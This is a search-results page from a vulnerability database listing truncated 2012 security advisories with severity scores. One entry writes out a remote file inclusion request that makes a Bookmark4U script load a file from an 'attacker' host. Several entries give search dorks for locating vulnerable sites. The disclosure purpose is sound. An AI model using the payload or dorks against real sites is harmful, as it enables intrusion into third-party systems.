
47153 matches found

securityvulns
added 2012/07/11 12:0 a.m., 80 views

[CVE-2012-3376] Apache Hadoop HDFS information disclosure vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello, Users of Apache Hadoop should be aware of a security vulnerability recently discovered, as described by the following CVE. In particular, please note the "Users affected", "Versions affected", and "Mitigation" sections. The project team will be...

CVSS 7.5, AI score 0.2, EPSS 0.02655
Exploits: 1

securityvulns
added 2012/07/11 12:0 a.m., 98 views

AST-2012-011: Remote crash vulnerability in voice mail application

Asterisk Project Security Advisory - AST-2012-011 Product Asterisk Summary Remote crash vulnerability in voice mail application Nature of Advisory Denial of Service Susceptibility Remote authenticated sessions Severity Moderate Exploits Known No Reported On June 13, 2012 Reported By Nicolas...

CVSS 4, AI score 0.5, EPSS 0.03197
Exploits: 0

securityvulns
added 2012/07/11 12:0 a.m., 38 views

Microsoft Office security vulnerabilities

VBA unsafe library loading, Office for Mac weak files permissions...

CVSS 6.9, AI score 2.9, EPSS 0.21028
Exploits: 1, Affected Software: 1

securityvulns
added 2012/07/11 12:0 a.m., 40 views

Microsoft Sharepoint multiple security vulnerabilities

Cross-site scripting, URL redirection...

CVSS 6.8, AI score 1, EPSS 0.2308
Exploits: 9

securityvulns
added 2012/07/11 12:0 a.m., 86 views

NDTV Cross Site Scripting Vulnerabilitiy

Exploit Title : NDTV Cross Site Scripting Vulnerabilitiy Author : Iranian Security & Research Team Discovered By : zilli0o0n Home : sec-lab.ir Contact : research at sec-lab dot ir Software Link : www.ndtv.com DorK : "Copyright NDTV Convergence Limited 2012"...

AI score 0.9
Exploits: 0

securityvulns
added 2012/07/11 12:0 a.m., 100 views

Behsamanco CMS Editor Vulnerability

Exploit Title : Behsamanco CMS Editor Vulnerability Author : Iranian Security & Research Team Discovered By : R3dMind Home : sec-lab.ir Contact : research at sec-lab dot ir Software Link : www.behsamanco.com Security Risk : high Dork : inurl:".ir/Controls/TextEditor/"...

Exploits: 0

securityvulns
added 2012/07/11 12:0 a.m., 88 views

BookNux 0.2 <= Multiple Vulnerabilities

BookNux 0.2 = Multiple Vulnerabilities Discovered by: Jean Pascal Pereira [email protected] Vendor information: "Commentics is a free, advanced PHP comment script with many features. Professionally written and with open source code, its main aims are to be integrable, customizable and secure."...

AI score 1
Exploits: 0

securityvulns
added 2012/07/11 12:0 a.m., 88 views

[SECURITY] CVE-2012-2138 Apache Sling denial of service vulnerability

CVE-2012-2138 : Apache Sling denial of service vulnerability Severity: Important Vendor: The Apache Software Foundation Versions Affected: org.apache.sling.servlets.post bundle up to 2.1.0 Description: The @CopyFrom operation of the Sling POST servlet allows for copying a parent node to one of it...

CVSS 5, AI score 0.7, EPSS 0.14122
Exploits: 3

securityvulns
added 2012/07/09 12:0 a.m., 68 views

[USN-1444-1] BackupPC vulnerability

========================================================================== Ubuntu Security Notice USN-1444-1 May 17, 2012 backuppc vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubun...

CVSS 4.3, AI score 0.3, EPSS 0.02067
Exploits: 1

securityvulns
added 2012/07/09 12:0 a.m., 64 views

CVE-2012-2380: Apache Roller Cross-Site-Resource-Forgery (XSRF) vulnerability

Severity: important Vendor: The Apache Software Foundation Versions Affected: Roller 4.0.0 to Roller 4.0.1 Roller 5.0 The unsupported Roller 3.1 release is also affected Description: HTTP POST interfaces in the Roller admin/editor console were not protected from CSRF attacks. This issue has been...

AI score 0.2, EPSS 0.01592
Exploits: 0

securityvulns
added 2012/07/09 12:0 a.m., 339 views

IIS Short File/Folder Name Disclosure by using tilde ~ character

Link: http://soroush.secproject.com/downloadable/iistildeshortnamedisclosure.txt Exploit-db link: www.exploit-db.com/exploits/19525/ ---------------------------- Security Research - IIS Short File/Folder Name Disclosure Website : http://soroush.secproject.com/blog/ I. BACKGROUND...

Exploits: 0

securityvulns
added 2012/07/09 12:0 a.m., 81 views

[USN-1497-1] Nova vulnerabilities

========================================================================== Ubuntu Security Notice USN-1497-1 July 03, 2012 nova vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubunt...

CVSS 5.5, AI score 0.9, EPSS 0.02997
Exploits: 2

securityvulns
added 2012/07/09 12:0 a.m., 102 views

NGS00162 Patch Notification: Symantec Message Filter Session Hijacking via session fixation

High Risk Vulnerability in Symantec Message Filter 2 July 2012 Ben Williams of NCC Group has discovered a High risk vulnerability in Symantec Message Filter Impact: Session Hijacking via session fixation Versions affected: Symantec Message Filter Version 6.3 An updated version of the software has...

AI score 1.2
Exploits: 0

securityvulns
added 2012/07/09 12:0 a.m., 99 views

Forum Oxalis 0.1.2 <= SQL Injection Vulnerability

Forum Oxalis 0.1.2 = SQL Injection Vulnerability Discovered by: Jean Pascal Pereira [email protected] Vendor information: "Forum Oxalis is a minimalis GPL PHP forum using CSS." Vendor URI: http://developer.berlios.de/projects/forumoxalis/ Risk-level: High The application is prone to a remote SQL...

AI score 0.4
Exploits: 0

securityvulns
added 2012/07/09 12:0 a.m., 43 views

XSS, Redirector and FPD vulnerabilities in WordPress

Hello 3APA3A! In June I've disclosed vulnerabilities in WordPress, which I'd present for you. They take place in plugin Akismet for WordPress and it's core-plugin since version WP 2.0, so these vulnerabilities concern WordPress itself. This is the first in series of advisories concerning...

AI score 0.7
Exploits: 0

securityvulns
added 2012/07/09 12:0 a.m., 144 views

[SECURITY] [DSA 2504-1] libspring-2.5-java security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2504-1 [email protected] http://www.debian.org/security/ Florian Weimer June 28, 2012 http://www.debian.org/security/faq -...

CVSS 7.5, AI score 1, EPSS 0.11779
Exploits: 1

securityvulns
added 2012/07/09 12:0 a.m., 29 views

IBM Edge Components Caching Proxy crossite scripting

Cross-site scripting on non-existent page...

CVSS 6.8, AI score 1.7, EPSS 0.03278
Exploits: 0, References: 1, Affected Software: 1

securityvulns
added 2012/07/09 12:0 a.m., 70 views

Event Script PHP v1.1 CMS - Multiple Web Vulnerabilites

Title: ====== Event Script PHP v1.1 CMS - Multiple Web Vulnerabilites Date: ===== 2012-06-10 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=606 VL-ID: ===== 606 Common Vulnerability Scoring System: ==================================== 7 Introduction: ============= Even...

AI score 0.3
Exploits: 0

securityvulns
added 2012/07/09 12:0 a.m., 45 views

MIT Kerberos 5 kadmind DoS

NULL pointer dereference...

CVSS 4, AI score 2.6, EPSS 0.03115
Exploits: 1, Affected Software: 1

securityvulns
added 2012/07/09 12:0 a.m., 50 views

Cyberoam advisory

Vulnerability in Cyberoam DPI devices 30 Jun 2012 CVE-2012-3372 =================================================================== Cyberoam make a range of DPI devices http://www.cyberoamworks.com/ which are capable of intercepting SSL connections. In common with all such devices, in order to...

CVSS 5.8, AI score 0.5, EPSS 0.00938
Exploits: 0

securityvulns
added 2012/07/09 12:0 a.m., 27 views

Symantec Message Filter session hijacking

No description provided...

AI score 1.5
Exploits: 0, References: 1, Affected Software: 1

securityvulns
added 2012/07/09 12:0 a.m., 38 views

HP Device Access Manager for Protect Tools Information Store ActiveX memory corruption

Buffer overflows in different methods...

CVSS 7.5, AI score 4.2, EPSS 0.07981
Exploits: 1, References: 3, Affected Software: 2

securityvulns
added 2012/07/09 12:0 a.m., 50 views

Basilic RCE bug

Hi Dear Sir Basilic is an Automated Bibliography Server for Research Publications Diffusion that use by many research center. there is a RCE bug in basilic/Config/diff.php s could allow an attacker to run system command in server. sample:...

AI score 0.9
Exploits: 0

securityvulns
added 2012/07/09 12:0 a.m., 97 views

7sepehr SQL Injection Vulnerability

Exploit Title : 7sepehr SQL Injection Vulnerability Author : Iranian security & Research Lab Discovered By : Ehram.shahmohamadi Home : sec-lab.ir Contact : research at sec-lab dot ir Portal Link : www.7sepehr.Com Security Risk : High DorK : "Powered by 7sepehr.com"...

AI score 1.6
Exploits: 0

securityvulns
added 2012/07/09 12:0 a.m., 135 views

Bookmark4U lostpasswd.php env[include_prefix] Parameter RFI

vendor - http://bookmark4u.sourceforge.net/ version - 2.1 solution - product discontinued example - http://target/bookmark4u/lostpasswd.php?env5Bincludeprefix5D=http://attacker/path/to/file.txt???...

AI score 1
Exploits: 0

securityvulns
added 2012/07/09 12:0 a.m., 19 views

EMC RSA Access Manager replay attack

It's possible to replay a sniffed session...

AI score 4.6
Exploits: 0, References: 1, Affected Software: 1

securityvulns
added 2012/07/09 12:0 a.m., 25 views

HP Photosmart printers DoS

No description provided...

CVSS 7.8, AI score 1.4, EPSS 0.02335
Exploits: 0, References: 1

securityvulns
added 2012/07/09 12:0 a.m., 31 views

bcfg2 shell characters vulnerability

It's possible to execute code as root...

CVSS 9, AI score 4.9, EPSS 0.0382
Exploits: 0, References: 1, Affected Software: 1

securityvulns
added 2012/07/09 12:0 a.m., 39 views

Microsoft IIS security vulnerabilities

Requests flood with sign in the path leads to server DoS; files and folders are accessible via 8.3 name making it easier to bruteforce names of hidden files and folders...

AI score 2.8
Exploits: 0, References: 2

securityvulns
added 2012/07/09 12:0 a.m., 51 views

[security bulletin] HPSBPI02794 SSRT100542 rev.1 - Certain HP Photosmart Printers, Remote Denial of Service (DoS)

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c02931414 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02931414 Version: 1 HPSBPI02794...

CVSS 7.8, AI score 0.3, EPSS 0.02335
Exploits: 0

securityvulns
added 2012/07/09 12:0 a.m., 62 views

NGS00194 Patch Notification: Nagios XI Network Monitor Blind SQL Injection

High Risk Vulnerability in Nagios XI Network Monitor 2 July 2012 Daniel Compton of NCC Group has discovered a High risk vulnerability in Nagios XI Network Monitor Impact: Nagios XI Network Monitor Blind SQL Injection Versions affected: Nagios XI Network Monitor 2011R1.9 An updated version of the...

AI score 0.5
Exploits: 0

securityvulns
added 2012/07/09 12:0 a.m., 65 views

SEC Consult SA-20120626-0 :: Zend Framework - Local file disclosure via XXE injection

SEC Consult Vulnerability Lab Security Advisory 20120626-0 ======================================================================= title: Local file disclosure via XXE injection product: Zend Framework vulnerable version: 1.11.11 1.12.0 RC1 2.0.0 beta4 and earlier versions / branches fixed versio...

AI score 7.6
Exploits: 0

securityvulns
added 2012/07/09 12:0 a.m., 117 views

7sepehr SQL Injection Vulnerability

Exploit Title : 7sepehr SQL Injection Vulnerability Author : Iranian Security & Research Team Discovered By : Ehram.shahmohamadi Home : sec-lab.ir Contact : research at sec-lab dot ir Portal Link : www.7sepehr.Com Security Risk : High DorK : "Powered by 7sepehr.com"...

AI score 1.4
Exploits: 0

securityvulns
added 2012/07/09 12:0 a.m., 59 views

plow 0.0.5 <= Buffer Overflow Vulnerability

plow 0.0.5 = Buffer Overflow Vulnerability Discovered by: Jean Pascal Pereira [email protected] Vendor information: "plow is a command line playlist generator." Vendor URI: http://developer.berlios.de/projects/plow/ Risk-level: Medium The application is prone to a local buffer overflow...

AI score 0.2
Exploits: 0

securityvulns
added 2012/07/09 12:0 a.m., 40 views

plow 0.0.5 <= Buffer Overflow Vulnerability

plow 0.0.5 = Buffer Overflow Vulnerability Discovered by: Jean Pascal Pereira [email protected] Vendor information: "plow is a command line playlist generator." Vendor URI: http://developer.berlios.de/projects/plow/ Risk-level: Medium The application is prone to a local buffer overflow...

AI score 0.2
Exploits: 0

securityvulns
added 2012/07/09 12:0 a.m., 83 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc...

CVSS 7.5, AI score 1.6, EPSS 0.67256
Exploits: 31, References: 26, Affected Software: 14

securityvulns
added 2012/07/09 12:0 a.m., 65 views

[USN-1488-1] Linux kernel vulnerabilities

========================================================================== Ubuntu Security Notice USN-1488-1 June 29, 2012 linux vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubun...

CVSS 7.2, AI score 0.2, EPSS 0.00979
Exploits: 4

securityvulns
added 2012/07/09 12:0 a.m., 54 views

Linux kernel multiple security vulnerabilities

DoS, privilege escalation...

CVSS 7.2, AI score 2.7, EPSS 0.00979
Exploits: 5, References: 2, Affected Software: 1

securityvulns
added 2012/07/09 12:0 a.m., 36 views

ESA-2012-026: RSA Access Manager Session Replay Vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2012-026: RSA Access Manager Session Replay Vulnerability EMC Identifier: ESA-2012-026 CVE Identifier: CVE-2012-2281 Severity Rating: CVSSv2 Base Score: 6. 8 AV:A/AC:H/Au:N/C:C/I:C/A:C Affected Products: RSA Access Manager Server version 6.0.x RSA...

CVSS 6.8, AI score 0.2, EPSS 0.0068
Exploits: 0

securityvulns
added 2012/07/09 12:0 a.m., 77 views

[CVE-2012-0694] SugarCRM CE <= 6.3.1 "unserialize()" PHP Code Execution

------------------------------------------------------- SugarCRM CE = 6.3.1 "unserialize" PHP Code Execution ------------------------------------------------------- author...........: Egidio Romano aka EgiX mail.............: n0b0d13satgmaildotcom software link....: http://www.sugarcrm.com/ -...

AI score 1.2, EPSS 0.67256
Exploits: 13

securityvulns
added 2012/07/09 12:0 a.m., 53 views

IBM Edge Components Caching Proxy XSS Followup

Rapid7 probably found this vulnerability on October 23 2002 http://seclists.org/fulldisclosure/2002/Oct/330 and its called CVE- 2002-1167 They don't show the output and specify it is error message but the injection method is the same. The update is it works on IBM Edge Components Caching Proxy -...

Exploits: 0

securityvulns
added 2012/07/09 12:0 a.m., 10752 views

GuestBook Scripts PHP v1.5 - Multiple Web Vulnerabilites

Title: ====== GuestBook Scripts PHP v1.5 - Multiple Web Vulnerabilites Date: ===== 2012-06-11 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=601 VL-ID: ===== 601 Common Vulnerability Scoring System: ==================================== 7.5 Introduction: =============...

AI score 0.1
Exploits: 0

securityvulns
added 2012/07/09 12:0 a.m., 45 views

ZDI-12-106 : Avaya IP Office Customer Call Reporter ImageUpload Remote Code Execution Vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ZDI-12-106 : Avaya IP Office Customer Call Reporter ImageUpload Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-106 June 28, 2012 - -- CVE ID: CVE-2012-3811 - -- CVSS: 9.7, AV:N/AC:L/Au:N/C:C/I:C/A:P - --...

CVSS 10, AI score 0.5, EPSS 0.62876
Exploits: 8

securityvulns
added 2012/07/09 12:0 a.m., 30 views

Avaya IP Office Customer Call Reporter code execution

It's possible to upload executable files via ImageUpload.ashx...

CVSS 10, AI score 3.4, EPSS 0.62876
Exploits: 8, References: 1, Affected Software: 1

securityvulns
added 2012/07/09 12:0 a.m., 222 views

REWTERZ-20120629 - TEMENOS T24 Cross-Site Scripting (XSS) Vulnerability

Rewterz Security Research Group Advisory ======================================================== I. Overview ======================================================== A Cross-Site Scripting XSS vulnerability has been identified in TEMENOS T24 Core Banking Solution System. This vulnerability allow...

AI score 0.3
Exploits: 0

securityvulns
added 2012/07/09 12:0 a.m., 49 views

.Net Framework Tilde Character DoS - Sorry, exploit-db link corrected

Link: http://soroush.secproject.com/downloadable/iistildedos.txt Exploit-db link: www.exploit-db.com/exploits/19575 ---------------------------- Security Research - .Net Framework Tilde Character DoS Website : http://soroush.secproject.com/blog/ I. BACKGROUND --------------------- "The .NET...

AI score 0.1
Exploits: 0

securityvulns
added 2012/07/09 12:0 a.m., 47 views

Spring Framework information leakage

No description provided...

CVSS 7.5, AI score 1.7, EPSS 0.11779
Exploits: 1, References: 1, Affected Software: 1

securityvulns
added 2012/07/09 12:0 a.m., 28 views

Cyberoam DPI unsafe certificates

All devices use same certificates for SSL connection hijacking...

AI score 2.3
Exploits: 0, References: 1

securityvulns
added 2012/07/09 12:0 a.m., 73 views

[security bulletin] HPSBMU02783 SSRT100806 rev.1 - HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Cross Site Scripting (XSS)

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c03343724 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03343724 Version: 1 HPSBMU02783...

CVSS 4.3, AI score 0.3, EPSS 0.01612
Exploits: 0

securityvulns
added 2012/07/09 12:0 a.m., 59 views

libtiff library integer overflow

Integer overflow on tiff parsing...

CVSS 7.5, AI score 5.3, EPSS 0.06918
Exploits: 0, References: 2, Affected Software: 1

Total number of security vulnerabilities: 47153